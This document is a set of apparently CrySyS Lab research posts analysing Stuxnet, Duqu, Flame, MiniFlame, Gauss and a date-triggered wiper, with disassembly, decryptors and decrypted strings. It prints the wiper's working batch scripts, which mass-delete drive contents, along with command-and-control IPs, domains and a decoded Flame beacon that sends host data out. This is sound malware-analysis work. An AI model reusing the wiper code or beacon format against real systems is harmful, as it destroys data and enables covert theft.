Some time ago, we rechecked some Stuxnet code. Guess what have we learned: Kasperksy already published Flame-Stuxnet relationship, but on the encryption level, there is another similarity. In fact, this was found by Norman back in June , but they compared with soapr32’s encryption which is slightly more different than 4069.dll’s encryption E2.

Stuxnet PLC dll encryption code:
unsigned int __cdecl encryption_routine_sub_10010B26(int a1)
{
int v1; // eax@1

v1 = (a1 + 11) * (a1 + 17);
return (a1 + 11) * (a1 + 17) ^ (((a1 + 11) * (a1 + 17) & 0xFFFFFF00 ^
((((unsigned int)((a1 + 11) * (a1 + 17)) >> 8) ^ v1
& 0xFF0000) >> 8)) >> 8);
}

Flame 4069.dll:
unsigned int __cdecl encryptor_sub_4025C0(int a1)
{
return (a1 + 11) * (a1 + 17) ^ (((unsigned __int16)((a1 + 11) * (a1 + 17) & 0xFF00)
^ ((((unsigned int)((a1 + 11) * (a1 + 17)) >> 8) ^ (a1 + 11) * (a1 + 17) &
0xFF0000) >> 8)) >> 8);

But for what reason was this encryption (obfuscation) used in 4069?

Flame 4069 contains some strings like this:

5F 5F 73 73 5F 73 5F 5F 00 31 32 25 77 69 6E 64 ss_s.12%wind
69 72 25 5C 73 79 73 74 65 6D 33 32 5C 72 64 63 ir%\system32\rdc
76 6C 74 33 32 2E 65 78 65 00 5F 5F 73 73 5F 65 vlt32.exe.__ss_e

Basically ss_s is some kind of magic string where “ss” stands for string. then “00” is a placeholder for a length variable,
“12” is a magic string, and finally the encrypted string is put in the file. Oh, no. Wait a minute. This seems to be human readable?! Yes, basically 4069 is prepared to accept encrypted strings “if needed”, but the marker for doing that is the length field. If it is 00 (as above), then the string is unencrypted, and can be direcrtly read, otherwise it uses E2 to decrypt the string. Magic “12” is not part of the “real” string, this info is a fix for our Flame/Skywiper tech report.
All-in-all, the connection is not jut strange, but in 4069 this encryption routine is not even really used. Most likely, authors have made a postprocessor for the binary finding s_s strings, 12 magics and then encrypting strings and writing back length field into the file, but for some reason in the samples we saw, they did not use the post-processing tool.


.text:004025F1 mov ebx, [esp+4+length_arg_4]
.text:004025F5 push esi
.text:004025F6 xor esi, esi
.text:004025F8 test ebx, ebx
.text:004025FA jbe short loc_402618

If length is not set, then jump out of the decryption loop.

Just a short blog entry to save this info for the history.

We investigated originally two different pieces of duqu payload. One contained resource 302 with a compressed .zdata section, the other contained the to-be-injected code without compression. The injector-loader is the same for the two versions, then how does it find if .zdata should be loaded?

Here is the trick from netp 301 resource:

.text:10001220 mov ecx, 5A4Dh
.text:10001225 cmp [eax], cx
.text:10001228 jnz loc_100012CD
.text:1000122E mov ecx, [eax+3Ch]
.text:10001231 add ecx, eax
.text:10001233 cmp dword ptr [ecx], 4550h
.text:10001239 jnz loc_100012CD

First it checks for “MZ” header, then it check “PE” signature.
Now,

.text:1000123F movzx edx, word ptr [ecx+6] ; number of sections in PE File (5)
.text:10001243 cmp dx, 3
.text:10001247 jbe loc_100012CD
.text:1000124D movzx esi, word ptr [ecx+14h] ; pointer to symbol table
.text:10001251 movzx edx, dx
.text:10001254 imul edx, 28h ; each section entry in section table- 40 byte
.text:10001257 add edx, ecx
.text:10001259 lea edi, [esi+edx-38h] ; the section before the last section (zdata) + offset
.text:1000125D test edi, edi
.text:1000125F jz short loc_100012CD
.text:10001261 cmp dword ptr [edi+1Ch], 0BC395587h ; zdata magic PE Header NumberOfRelocations is abused
.text:10001268 jnz short loc_100012CD
.text:1000126A cmp dword ptr [edi+8], 2Ch ; some check on physical size
.text:1000126E jb short loc_100012CD

As you can see, it calculates the exact place for the end of the section table then moves back to the entry before the last (this is .zdata info). Then it checks for a magic number 0xBC395587 which is stored in “NumberOfReloctions” value.

.text:10001270 mov esi, [edi+0Ch]
.text:10001273 add esi, eax
.text:10001275 cmp dword ptr [esi], 0D139120Eh
.text:1000127B jnz short loc_100012CD

Finally it checks the first 4 bytes of the .zdata section against 0xD139120e.

Iranian CERT Maher just posted http://www.certcc.ir/index.php?name=news&file=article&sid=2293

”
Latest investigation have been done by Maher center in cyber space identified a new targeted data wiping malware. Primitive analysis revealed that this malware wipes files on different drives in various predefined times. Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software. However, it is not considered to be widely distributed. This targeted attack is simple in design and it is not any similarity to the other sophisticated targeted attacks. The identified components of this threat are listed in the following table”…

As it happens quite some time, the malware itself seems not to be much of interest, but the possible targets and the way they probably used it makes it more into attention. So don’t judge too early about the lameness of such tool, it can still pinpoint an important action.

The main file, GrooveMonitor.exe is a self-extracting file, it contains a rar file at position 103936. The rar contains juboot, jucheck and sleep.

MD5
GrooveMonitor.exe [dropper] f3dd76477e16e26571f8c64a7fd4a9
juboot.exe fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe b7117b5d8281acd56648c9d08fadf630

Sleep.exe is basically a public tool available for batch programmers:
ftp://ftp.sac.sk/pub/sac/utiltask/sleep_47.zip

juboot is a UPX 3.03 compressed archive of a probably bat2exe converted file (not checked what exactly) (very low on budget to write batch malware?), that contains these:

"
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"
"

PADjuboot.batPA…

jucheck contains
"
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:*." /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:*." /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:*." /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:*." /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:*." /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:*." /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop*.*" /q /s /f
\start calc

:no
PAjucheck.batP☺
"

Still the questions are
a.) What is the dropper
b.) Is it surely an important attack, no matter how amateur the tools are?

SPE/MiniFlame contains the same “main” encryption alg from ver 4.00-5.00

It looks like this:
.text:10007DDE Decrypt_str_10007DDE proc near ; CODE XREF: sub_10001223+5p
.text:10007DDE ; sub_10001223+16p ...
.text:10007DDE
.text:10007DDE arg_0 = dword ptr 4
.text:10007DDE
.text:10007DDE mov ecx, [esp+arg_0]
.text:10007DE2 push esi
.text:10007DE3 cmp byte ptr [ecx+0Ch], 42h
.text:10007DE7 lea esi, [ecx+0Dh]
.text:10007DEA jnz short loc_10007DF0
.text:10007DEC mov eax, esi
.text:10007DEE pop esi
.text:10007DEF retn
.text:10007DF0 ; ---------------------------------------------------------------------------
.text:10007DF0
.text:10007DF0 loc_10007DF0: ; CODE XREF: Decrypt_str_10007DDE+Cj
.text:10007DF0 push ebx
.text:10007DF1 xor ebx, ebx
.text:10007DF3 xor edx, edx
.text:10007DF5 cmp [ecx+0Ah], bx
.text:10007DF9 jbe short loc_10007E16
.text:10007DFB
.text:10007DFB loc_10007DFB: ; CODE XREF: Decrypt_str_10007DDE+36j
.text:10007DFB mov al, dl
.text:10007DFD add al, 6Eh
.text:10007DFF imul bl
.text:10007E01 mov bl, 0C2h
.text:10007E03 sub bl, al
.text:10007E05 sub bl, dl
.text:10007E07 add [edx+esi], bl
.text:10007E0A mov bl, [edx+esi]
.text:10007E0D movzx eax, word ptr [ecx+0Ah]
.text:10007E11 inc edx
.text:10007E12 cmp edx, eax
.text:10007E14 jb short loc_10007DFB
.text:10007E16
.text:10007E16 loc_10007E16: ; CODE XREF: Decrypt_str_10007DDE+1Bj
.text:10007E16 mov eax, esi
.text:10007E18 pop ebx
.text:10007E19 mov byte ptr [ecx+0Ch], 42h
.text:10007E1D pop esi
.text:10007E1E retn
.text:10007E1E Decrypt_str_10007DDE endp
.text:10007E1E
.text:10007E1F
.text:10007E1F ; =============== S U B R O U T I N E =======================================
.text:10007E1F
.text:10007E1F
.text:10007E1F srand_10007E1F proc near ; CODE XREF: sub_10003377+Dp
.text:10007E1F push 0 ; Time
.text:10007E21 call ds:time
.text:10007E27 push eax ; Seed
.text:10007E28 call ds:srand
.text:10007E2E pop ecx
.text:10007E2F pop ecx
.text:10007E30 retn
.text:10007E30 srand_10007E1F endp
.text:10007E30


basically the structure is of a stream-cipher, where the generated key is not XORd, but ADDed to the encrypted byte to be decrypted. This is very similar to flame. dl is a counter, so the main thing is bl and the imul function. It’s not that complicated or novel, but still interesting.

It’s a bit strange, as the encrypted string table basically consists of some 3-tuple elements, and only the middle on is encrypted by the code above. It is similar, but not that similar to other Duqu or Flame encryption technique.

Here is some perl code to make a simple decryptor:

tobedecrypted:$t

$al=$dl;
$al= ($al+ 0x6e)%256;
$ax=$al*$bl % 65536; #imul bl?
$al=$ax % 256;
$bl= 0xc2;
$bl= ($bl -$al) %256;
$bl= ($bl -$dl) %256;
$t2= ($t+$bl) %256;
$bl= $t2;
$dl= ($dl+1) %256; #in fact dx, but dh is not used only as loop variable

$bufall2.=pack("C",$t2);
$i+=1;
if ($new==1)
{
$bl=0;
$dl=0;
}

output buffer: $bufall2

So after all, we can decrypt main strings. This encryption technique was not changed between 4.00-5.00 versions and also relates to USB (U) versions, too.

For v5.00 we get the following strings


bdagent.exe
%yJ^
outpost.exe
`icsvnt32a.ocx
Global\AdvTW32Ready500WfEvent
8Global\AdvTW32SyncEvent
lnkfile\shellex\IconHandler
{00021401-0000-0000-C000-000000000046}
dgfw
(icsvnt32.ocx
%windir%\system32\
%allusersprofile%\
msfrmt32.dll
gGlobal\ShellTRPInitEvent
Global\AdvTW32AutoDetect
8Global\MICEvent
(Global\TUSEvent
L1---
Global\ShlZoneSynchMutex
vbtLw
%allusersprofile%\mstlis.log
4|k
Iphlpapi.dll
Ws2_32.dll
\SS_data.bmp.ppm
%temp%\tksp1.tmp
W%temp%\tksp2.tmp
%temp%\tksp3.tmp
W%temp%\tksp4.tmp
%temp%\tksp7.tmp
%temp%\tksp8.tmp
]ContLo.txt
Cont.txt

ChannelD.txt

ChannelC.txt
ChannelB.txt
[ChannelA.txt
zFIONA
nSONIA
) Ti
hELVIS
0EVE
JC,B
DRAKE
xCHARLES
ALEX
BARBARA
tTIFFANY
pEOC
(
P%allusersprofile%\datFE2B.da1
%temp%\daa59.tmp
Q%windir%\system32\msfrmt32.dll
FiV=.
DllStartServer
P)mVu
jDllSto
77?'
lk_data.txt
%^no

inet_addr
inet_ntoa
htonl
ntohs
htons
GetAdaptersInfo
OGetBestInterface
RearWindow detected no activity since delta started, maybe no one logged in?.
+*#PFl+
RearWindow failed.
RearWindow throw an exception.
function returned:
BARBAR
BARBAR
Alex ends. Result is:
Alex Starts
Sam ends. Result is:
nH,1
Sam Starts
9Yg3d
Charles ends. Result is:
Charles Starts
Drake ends. Result is:
Drake Starts
tWO8
Elvis ends. Result is:
Elvis Starts
Eve ends. Result is:
Eve Starts
Sonia ends. Result is:
=1g3
Sonia Starts
'W~~
Fiona ends. Result is:
)OOQ
Fiona Starts
S{+w\
h&K=
{%mk
$&FILE_NAME=
&ACTION=
&COMP_ID=
@&LOGGED_ON=
&SEC_COUNT=
&SUC_CMD_ATTEMPTS=
&CMD_ATTEMPTS=&COMPUTER_NAME=
P&MAC=
(&IP=
&SERVICE_PACK=
&VERSION_INFO=
+&LI=
&COM_B=
SP v5.00H
@&TOOL_B=
Rdw^,Q
h0T^
&PASSWORD=
@&n8
UNIQUE_NUMBER=
jIQ:
85.25.0.24
LifeS
Q194.192.14.125
Grendercodec.info
videosy
nvidiastream.info
nvidiadrivers.i
202.75.58.179
nvidiasoft.info
syncstream.info
xflashupdates.info
/cgi-bin/counter.cgi
KSYSTEM\CurrentControlSet\Control\TimeZoneInformation
+!XQ
StandardTimeBias
StandardDateBias
SYSTEM\CurrentControlSet\Hardware Profiles\Current\Software\Fonts
PixelShader
advapi32.dll
Global\TRStepEvent
aah/x
sGlobal\MSTKCSrvEvent
vqL7
%allusersprofile%\icsvntu32.ocx
oC7g
Global\ShlZoneDataMutex
SYSTEM
svchost.exe
TRegNotifyChangeKeyVa
"'F/
explorer
KSOFTWARE\Classes\CLSID{35CEC8A3-2BE6-11D2-8773-92E220524153}\InProcServer32
SOFTWARE\Classes\CLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}\InProcServer32
mydocs.dll
SOFTWARE\Classes\CLSID{35CEC8A3-2BE6-11D2-8773-92E220524153}\InprocServer32
SOFTWARE\Classes\CLSID{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\InprocServer32
%windir%\System32\es.dll
MACHINE\SOFTWARE\Classes\CLSID{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\InprocServer32
DllUnregisterServer
DllRegisterServer
DllGetClassObject
%a+8@9
DllCanUnloadNow
LSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
PDefaultUserName
6Dq6
hNUL=
kernel32.dll
t_b|&
uGetIfTable
+iphlpapi.dll
shlwapi.dll
0PathS
?A5!
RevertToSelf
ImpersonateLoggedOnUser
XU-
RegOverridePredefKey
RegOpenCurrentUser
OpenProcessToken
LoadLibraryA
cVirtualAlloc
VirtualFree
VirtualProtect
)GetProcAddress
%allusersprofile%\Wnm.tmp
ProxyOverride
ProxyServer
ProxyEnable
0Software\Microsoft\Windows\CurrentVersion\Internet Settings
www.google.com
0Deskto
@Onenotem.exe
&?G?
Onenote.exe
paltalk.exe
mmc.exe
d&|us
mstsc.exe
ypager.exe
visio.exe
TE$o
powerpnt.exe
winproj.exe
k (c>
notepad.exe
netscape.exe
putty.exe
ftp.exe
telnet.exe
%exceed.exe
H`vS
sinetinfo.exe
icqlite.exe
icq.exe
@frontpage.exe
aim95.exe
(aim.exe
acrord32.exe
|acrobat.exe
Cygwin.exe
msdev.exe
xmsnmsgr.exe
msgplus.exe
hmsmsgs.exe
excel.exe
HWINWORD.exe
msimn.exe
OUTLOOK.exe
Mozilla.exe
firefox.exe
iexplore.exe


We did not cross-check it, but strange that it’s BARBAR here and not BARBARA (might be the fault of the decryptor).
The more interesting is that everybody was so interested in the language of recent targeted malware (Duqu, Flame, Gauss) and we could not get much “language mistakes” in those cases. Compared to that this is strange:


Alex ends. Result is:
Alex Starts


“Result is” is strange. “Starts” with capital S (for all functions, and all knows versions of the malware) is also strange.

<

p>
“RearWindow throw an exception.” – throw or throws? surely strange. This type of error was never convicted in Duqu and Flame or we were not able to find such yet.

It seems Gauss samples already started to float around, so some more info on Palida is not a surprise anymore.

Palida Narrow header info:

'head' Table - Font Header

Size = 54 bytes (expecting 54 bytes)
'head' version: 1.0
fontRevision: 1.1
checkSumAdjustment: 0xC5C64B82
magicNumber: 0x5F0F3CF5
flags: 0x001B- baseline(y)=0 - lsb(x)=0 - int ppem - nonlin aw
unitsPerEm: 2048
created: Fri Jan 28 21:48:24 2000
modified: Mon Dec 19 05:37:00 2011
xMin: -579
yMin: -804
xMax: 2298
yMax: 2033
macStyle bits: 0x0000
lowestRecPPEM: 12
fontDirectionHint: 1
indexToLocFormat: 0
glyphDataFormat: 0


Lucida Bright Regular header info:

'head' Table - Font Header

Size = 54 bytes (expecting 54 bytes)
'head' version: 1.0
fontRevision: 1.1
checkSumAdjustment: 0x8A94C916
magicNumber: 0x5F0F3CF5
flags: 0x001B- baseline(y)=0 - lsb(x)=0 - int ppem - nonlin aw
unitsPerEm: 2048
created: Fri Jan 28 19:13:11 2000
modified: Tue Mar 13 23:02:32 2001
xMin: -550
yMin: -1530
xMax: 3314
yMax: 2419
macStyle bits: 0x0000
lowestRecPPEM: 12
fontDirectionHint: 1
indexToLocFormat: 1
glyphDataFormat: 0


You can see the similarity in creation date.
The interesting thing is that Palida has 457 glyphs:

'maxp' Table - Maximum Profile

Size = 32 bytes (expecting 32 bytes)
'maxp' version: 1.0
numGlyphs: 457

from which some special characters are unusual


Glyf 440 -> PSGlyf Name # 192, name= 'dcaron1'
Glyf 441 -> PSGlyf Name # 193, name= 'Gcedilla1'
Glyf 442 -> PSGlyf Name # 194, name= 'gcedilla1'
Glyf 443 -> PSGlyf Name # 195, name= 'Kcedilla1'
Glyf 444 -> PSGlyf Name # 196, name= 'kcedilla1'
Glyf 445 -> PSGlyf Name # 197, name= 'Lcedilla1'
Glyf 446 -> PSGlyf Name # 198, name= 'lcedilla1'
Glyf 447 -> PSGlyf Name # 199, name= 'Lcaron1'
Glyf 448 -> PSGlyf Name # 200, name= 'lcaron1'
Glyf 449 -> PSGlyf Name # 201, name= 'Ncedilla1'
Glyf 450 -> PSGlyf Name # 202, name= 'ncedilla1'
Glyf 451 -> PSGlyf Name # 203, name= 'Rcedilla1'
Glyf 452 -> PSGlyf Name # 204, name= 'rcedilla1'


Or the fact the physics and math is so important that first glyphs are micro and Ohm.


-------------------------
PSGlyf Name # 1: micro
PSGlyf Name # 2: Ohm
PSGlyf Name # 3: increment
PSGlyf Name # 4: bulletmath
PSGlyf Name # 5: overscore
PSGlyf Name # 6: dmacron


One of the interesting glyphs is U+0104 also called Aogonek. First of all it exists mostly in CE fonts, second, it is a bit different from Lucida samples we checked. Check it yourself, too!

As you all know, Kaspersky Lab has just published a detailed tech report of the latest state-sponsored targeted threat named Gauss.

So the story of Stuxnet, Duqu (found and named by us, CrySyS Lab ), Flame (yes, we had a detailed tech report on that, but we called it sKyWIper ) has not stopped here, and as many said, we currently see only the tip of the iceberg.

So the big mystery of Gauss is why Palida Narrow, a modified font with fake copyright notice is installed on victim computers. It seems that no exploit, shellcode or nasty payload are inside. Most likely… Then why? Do they depend on Palida Narrow? Most likely not.

One possibility is that there are other components using Palida for some reasons. E.g., tricking with some characters on web pages to hide alerts, or similar, not really clear operations.

A very far-fetched idea is that Gauss uses the font for printed material. It actually tricks some parts of the system to substitute fonts with Palida, so any prints will contain Palida. Later, printed documents could be identified by looking on the tiny specialities of the font.

A third, and more probable idea is that Palida installation can be in fact detected remotely by web servers, thus the Palida installation is a marker to identify infected computers that visit some specially crafted web pages. We tell you how.

If you open a web page, it can contain a CSS style sheet link, that actually tells your browser how the text blocks should look like on the web page. This style sheet can in fact include references to font faces to be used. The font face definition can refer to a local font and a URL also (with some limitations) in order to get the necessary font face if it is not installed on your system.

Let’s consider the following part of the CSS file:


@font-face {
font-family: "Palida";
src: local("Palida Narrow"),
url("palida.ttf");
}


This definition tells your browser to use Palida Narrow local font if available, if not, call back the webpage to download a copy.

This standard behavior of the browsers makes it possible to enumerate all the fonts that are installed in your system, but particularly to pinpoint if Palida Narrow is installed.

Considering this case, if the Palida is installed, your browser will simply use it for rendering the web page. If not, and only in that case, it will try to download palida.ttf. If there is no palida.ttf download on the web page, then you have Palida installed on the system.

However, there is a problem: what if palida.ttf was not downloaded as you have turned off the look up of remote fonts in your browser, or you use some special browser. Here is a solution: Let’s specify and use a surely non-existing font, like Crysysida:


@font-face {
font-family: "Crysysida";
src:
url("Crysysida.ttf");
}


• If we have downloads for both Palida and Crysysida, then everything works great, and Palida is not installed
• If we only see download for Crysysida, then Palida is installed on the system
• Finally, if we see no downloads, then probably the user uses lynx or telnet to browse our webpage, or there are other circumstances that prevent the download of remote fonts.

What we detailed here is not only a possible reason of Palida having been installed on infected systems, but also a detection method for infected computers. Actually, we created a detection site of the Gauss malware by identifying Palida installations remotely. The small test site is available at http://gauss.crysys.hu

Of course the method is not bullet-proof, but an easy alternative check for those, who cannot find the fonts menu in the windows control panel.

Final note:
CrySyS Lab currently thinks, that Palida is actually a slightly modified Lucida Bright Narrow Demi Bold CE font, most likely from Bigelow and Holmes, made back in 2000, although we do not have such a sample.

Basically the main functionality of the WuSetupV.exe of Flame is to create a special URL, download the main component of Flame using the special URL, store it and install it on the victim computer.

The most interesting topic is what type of data is stored inside the URL created by WuSetupV as it uses multiple parameters, like
GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1

So let’s see how the parts of the URL are created.

The “jz=” parameter is created randomly, but reused if error occurs and second download is done. This means the value might be used multiple times within the same session, hence it is a session id.
The value is converted to decimal. The random generator is a well known simple one, the main part is

.text:00403489 mov eax, dword_4053C0
.text:0040348E imul eax, 343FDh
.text:00403494 add eax, 269EC3h ;
.text:00403499 mov dword_4053C0, eax
.text:0040349E sar eax, 10h
.text:004034A1 and eax, 7FFFh

The “am=” parameter, handled around sub_401426, contains a hex string, which is bytewise xor’d with 0x55. The hex string is 48 bits long and contains the interface MAC address. In this case am=55597C801D14 refers to the 00:0c:29:d5:48:41 VMware MAC address.

The “ef=” parameter is the IP address or IP addresses (concatenated) of the client computer, most likely it is useful if proxy server or NAT is used. The parameter is character-wise XORd with 0x44 at each byte, with the subroutine described below for parameter “ov=” (loc_402A30), and represented in hex string. In this way 0x40474645 represents IP address 1.2.3.4.

The “ov=” parameter contains Windows version information. The string “ov=666641736666417766664174” can be separated into three 8-character hex string

66664173
66664177
66664174


All three parts are XOR’d with 0x66 at the end by the following simple code fragment:

.text:00402A30 loc_402A30: ; CODE XREF: xor_encr_sub_402A2E+12j
.text:00402A30 mov eax, [esp+arg_0]
.text:00402A34 mov dl, [esp+arg_4]
.text:00402A38 add eax, ecx
.text:00402A3A xor [eax], dl
.text:00402A3C inc ecx
.text:00402A3D cmp ecx, 4
.text:00402A40 jb short loc_402A30
.text:00402A42 retn

The original values are:

2715
2711
2712


The originals of all of these three values are 0x2710 added as follows:

.text:0040159D mov eax, [ebp+VersionInformation.dwMajorVersion]
.text:004015A3 push 66h ; int
.text:004015A5 add eax, 2710h
.text:004015AA push edi ; lpString1
.text:004015AB push eax ; int
.text:004015AC call xor_and_printf08x_sub_402A63
.text:004015B1 add esp, 0Ch
.text:004015B4 test eax, eax
.text:004015B6 jz short loc_4015FE
.text:004015B8 mov eax, [ebp+VersionInformation.dwMinorVersion]
.text:004015BE add dword ptr [esi], 8
.text:004015C1 push 66h ; int
.text:004015C3 add eax, 2710h
.text:004015C8 push edi ; lpString1
.text:004015C9 push eax ; int
.text:004015CA call xor_and_printf08x_sub_402A63
.text:004015CF add esp, 0Ch
.text:004015D2 test eax, eax
.text:004015D4 jz short loc_4015FE
.text:004015D6 mov eax, [ebp+VersionInformation.dwPlatformId]
.text:004015DC add dword ptr [esi], 8
.text:004015DF push 66h ; int
.text:004015E1 add eax, 2710h
.text:004015E6 push edi ; lpString1
.text:004015E7 push eax ; int
.text:004015E8 call xor_and_printf08x_sub_402A63

Therefore, the string above represents

dwMajorVersion = 5
dwMinorVersion = 1
dwPlatformId = 2


From which 5.1 represents Windows XP, and VER_PLATFORM_WIN32_NT==2 as dwPlatformId.

The “fd=” parameter stores HKEY_CURRENT_USER\Console\StandardSize or in HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry dword in decimal form, depending on the Windows version. In our case it is 28369876, which is 0x01B0E3D4 in hex. This variable in the registry is not standard. If it does not exist, the StandardSize parameter is created by WuSetupV.exe as a random number seeded with time information, and stored in the registry; the related code is the following:

.text:00403C01 call time_rnd_seed_sub_4025BF
.text:00403C06 call rndgen3_4times_sub_402637
.text:00403C0B mov [esi], eax
.text:00403C0D mov dword ptr [edi], 1
.text:00403C13 mov edx, [esi]
.text:00403C15 push edx ; Data
.text:00403C16 call set_standardsize_key_sub_403DB0

The difference between “jc=” and “fd=” is that “jc=” is a session identifier, re-used only within a single run of WuSetupV.exe, while “fd=” is a permanent id for the particular computer stored in the registry.

Interestingly, libclanattack Lua script also uses StandardSize, but the corresponding key is in TimeZoneInformation:

1 [-]: GETUPVAL R0 U0 ; R0 := U0
2 [-]: GETTABLE R0 R0 K0 ; R0 := R0["remoteSafety"]
3 [-]: SELF R0 R0 K1 ; R1 := R0; R0 := R0["getRegDword"]
4 [-]: LOADK R2 K2 ; R2 := "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
5 [-]: LOADK R3 K3 ; R3 := "StandardSize"
6 [-]: TAILCALL R0 4 0 ; R0,... := R0(R1,R2,R3)
7 [-]: RETURN R0 0 ; return R0,...
8 [-]: RETURN R0 1 ; return

The “pr=” parameter is set according to the existence of the StandardSize parameter. If it was found by the program, then “pr=0”, if it is the first start of the malicious WuSetupV, then “pr=1” shows to the server that this is a new installation.

WuSetupV.exe looks for the registry key
SYSTEM\CurrentControlSet\Control\TimeZoneInformation
But it is not interested in the time zone. In reality it looks for the StandardDateBias data inside the registry, then later it adds to “dd=” CGI parameter in decimal form. The real reason is unknown.

The longest part of the URL, the “pl=” CGI parameter is encrypted by a simple substitution table:


hXk1Qrbf6VH~29SMYAsCF-q7Omad0eGLojWi.DyvK8zcnZxRTUpwE_B5tuNPIJgl43
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-.

This way for the query

GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mshome-f3be293c
Connection: Keep-Alive

the original value of “pl=”, which contains the list of current active processes, is in this case:

_System_Process_ System smss csrss winlogon services lsass vmacthlp svchost
svchost svchost svchost svchost spoolsv explorer VMwareTray vmtoolsd vmtoolsd alg
wscntfy wuauclt WuSetupV.ex_ regedit WuSetupV

Upon unsuccessful download, WuSetupV creates a second URL and sends it to the server like the one below:


GET /view.php?ac=1&jz=2203776806&fd=28369876&gb=0&rt=a0b0c0d HTTP/1.1

Summary of the URL parameters used by WuSetupV.exe


mp: is fixed 1 for first query
jz: session identifier
fd: computer identifier
am: MAC address of interface
ef: IP address
pr: is 0 if StandardSize already exists, pr=1 for new installations
ec: generally 0, probably some error checking related to ~DHF593.tmp file
ov: Windows version number
pl: Process list
ac: is fixed 1; used in second query
gb: 0, ??
rt: is a0b0c0d, ??
dd: value of StandardDateBias, if set

TODOs:
What exactly are gb, ec, rt good for?
How is the program related to ef_trace file?

Finally we were able to do some tests, and we can confirm Bitdefender’s http://labs.bitdefender.com/2012/06/flame-the-story-of-leaked-data-carried-by-human-vector/ finding on USB file transfer of Flame. Again, please first read our original tech report first.

If started by rundll, Flame creates “.” file within minutes.

As the file name is very special, under windows the easiest way to check is dir /a.
Under Linux you can use the good old sleuth kit:

# fls -a ./usb1
r/d 2: .
v/v 3368675: MBR
v/v 3368676:FAT1
v/v 3368677: FAT2
d/d 3368678:OrphanFiles


But given
# istat ./usb1 2
Directory Entry: 2
Allocated
File Attributes: Directory
Size: 1024
Name:

Directory Entry Times:
Written: Thu Jan 1 01:00:00 1970
Accessed: Thu Jan 1 01:00:00 1970
Created: Thu Jan 1 01:00:00 1970

Sectors:
1680 1681

So if not file 2, then maybe 3, 4?

It’s surely not what we are looking for.

istat ./usb1 4
Directory Entry: 4
Allocated
File Attributes: File, Hidden, System, Archive
Size: 172032
Name: HUB001.DAT

Directory Entry Times:
Written: Tue Jun 12 22:13:50 2012
Accessed: Tue Jun 12 00:00:00 2012
Created: Thu Jan 1 01:00:00 1970

Sectors:
1682 1683 1684 1685 1686 1687 1688 1689
1690 1691 1692 1693 1694 1695 1696 1697
1698 1699 1700 1701 1702 1703 1704 1705
1706 1707 1708 1709 1710 1711 1712 1713
1714 1715 1716 1717 1718 1719 1720 1721
1722 1723 1724 1725 1726 1727 1728 1729
1730 1731 1732 1733 1734 1735 1736 1737
